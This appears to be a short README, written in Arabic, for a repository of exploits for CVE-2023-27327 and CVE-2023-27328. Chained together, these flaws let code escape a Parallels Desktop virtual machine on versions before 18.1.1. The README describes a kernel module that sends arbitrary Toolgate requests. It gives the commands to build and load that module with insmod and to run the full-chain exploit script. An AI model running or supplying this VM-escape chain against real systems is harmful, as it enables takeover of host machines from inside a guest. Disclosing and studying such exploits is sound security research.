
استغلالات لـ CVE-2023-27327 و CVE-2023-27328
يحتوي هذا المستودع على استغلالات لـ CVE-2023-27327 وCVE-2023-27328، والتي يمكن استخدامها معًا للهروب من آلة افتراضية في Parallels Desktop في الإصدارات السابقة للإصدار 18.1.1.
كما يحتوي أيضًا على كود لوحدة نواة مطلوبة، في prl_mod، والتي يمكن استخدامها لإرسال طلبات Toolgate عشوائية (< opcode 0x8000) من مساحة المستخدم، باستخدام إدخال proc يتم إنشاؤه في /proc/driver/prl_tg_pwn.
قم ببناء وتحميل وحدة النواة:
cd prl_mod
make -f Makefile.kmods
sudo insmod ./prl_tg_pwn/Toolgate/Guest/Linux/prl_tg/prl_tg_pwn.ko
قم بتشغيل الاستغلال:
cd ..
pip install -r requirements.txt
./3_full_chain.py